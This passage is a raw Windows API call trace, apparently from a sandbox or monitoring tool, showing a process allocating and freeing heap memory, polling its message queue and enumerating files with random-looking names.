Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e10 [0157.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e10 | out: hHeap=0x8a0000) returned 1 [0157.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.281] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e10 [0157.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e10 | out: hHeap=0x8a0000) returned 1 [0157.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0157.281] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8b8 [0157.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e10 [0157.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1eb0 [0157.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8e2af8 [0157.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ec0 [0157.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ed0 [0157.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ec0 | out: hHeap=0x8a0000) returned 1 [0157.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ed0 | out: hHeap=0x8a0000) returned 1 [0157.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e10 | out: hHeap=0x8a0000) returned 1 [0157.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2af8 | out: hHeap=0x8a0000) returned 1 [0157.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8b8 | out: hHeap=0x8a0000) returned 1 [0157.282] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0157.282] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1eb0 [0157.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.282] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1eb0 [0157.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1b8 [0157.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8b8 [0157.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.282] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee78cb0, ftCreationTime.dwHighDateTime=0x1d5d815, ftLastAccessTime.dwLowDateTime=0x3a5f2470, ftLastAccessTime.dwHighDateTime=0x1d5e4f2, ftLastWriteTime.dwLowDateTime=0x3a5f2470, ftLastWriteTime.dwHighDateTime=0x1d5e4f2, nFileSizeHigh=0x0, nFileSizeLow=0x53cf, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="SEObOseiAS.bmp", cAlternateFileName="SEOBOS~1.BMP")) returned 1 [0157.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0157.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dd0 [0157.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8b8 | out: hHeap=0x8a0000) returned 1 [0157.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1b8 | out: hHeap=0x8a0000) returned 1 [0157.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.282] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1eb0 [0157.283] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1eb0 [0157.283] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1eb0 [0157.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8b8 [0157.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e10 [0157.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8e2af8 [0157.283] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.283] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e10 [0157.283] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e10 [0157.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0157.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.283] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x12a006a, ftCreationTime.dwLowDateTime=0x3eec, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0x10e006b, nFileSizeHigh=0x3eec, nFileSizeLow=0x8e2ba0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="SE\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8b8 [0157.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dd0 [0157.284] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e10 [0157.294] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0157.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.296] FindClose (in: hFindFile=0x90af18 | out: hFindFile=0x90af18) returned 1 [0157.299] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.302] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.302] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.303] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0157.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6f0 [0157.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.303] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28da0830, ftCreationTime.dwHighDateTime=0x1d5dc11, ftLastAccessTime.dwLowDateTime=0x8d38b190, ftLastAccessTime.dwHighDateTime=0x1d5e405, ftLastWriteTime.dwLowDateTime=0x8d38b190, ftLastWriteTime.dwHighDateTime=0x1d5e405, nFileSizeHigh=0x0, nFileSizeLow=0xda2c, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="oB O9kLZ7MPDb_Fa.mp3", cAlternateFileName="OBO9KL~1.MP3")) returned 1 [0157.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e00 [0157.303] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.303] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.303] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6f0 [0157.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x8e2a80 [0157.303] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.303] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1da0 [0157.304] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1da0 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.304] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b149f0, ftCreationTime.dwHighDateTime=0x1d5da5b, ftLastAccessTime.dwLowDateTime=0xd70c6520, ftLastAccessTime.dwHighDateTime=0x1d5e345, ftLastWriteTime.dwLowDateTime=0xd70c6520, ftLastWriteTime.dwHighDateTime=0x1d5e345, nFileSizeHigh=0x0, nFileSizeLow=0x800b, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="q4eGaKOHIBJ.png", cAlternateFileName="Q4EGAK~1.PNG")) returned 1 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6f0 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e00 [0157.304] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.304] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.304] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6f0 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1da0 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8e2a80 [0157.304] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.304] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.304] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6f0 [0157.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.305] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf556c8a0, ftCreationTime.dwHighDateTime=0x1d5da4d, ftLastAccessTime.dwLowDateTime=0xfb4c46b0, ftLastAccessTime.dwHighDateTime=0x1d5e51d, ftLastWriteTime.dwLowDateTime=0xfb4c46b0, ftLastWriteTime.dwHighDateTime=0x1d5e51d, nFileSizeHigh=0x0, nFileSizeLow=0x1565f, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="R4ko9W2ZwNtIqWlJH0ER.gif", cAlternateFileName="R4KO9W~1.GIF")) returned 1 [0157.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db330 [0157.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e00 [0157.305] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.305] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.305] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6f0 [0157.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x8e2a80 [0157.305] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.305] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1da0 [0157.305] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1da0 [0157.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0157.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.305] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52e19210, ftCreationTime.dwHighDateTime=0x1d5df9a, ftLastAccessTime.dwLowDateTime=0x2f441200, ftLastAccessTime.dwHighDateTime=0x1d5dd75, ftLastWriteTime.dwLowDateTime=0x2f441200, ftLastWriteTime.dwHighDateTime=0x1d5dd75, nFileSizeHigh=0x0, nFileSizeLow=0x11488, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="s1epd3.png", cAlternateFileName="")) returned 1 [0157.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6f0 [0157.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0157.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e00 [0157.306] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.306] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.306] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, 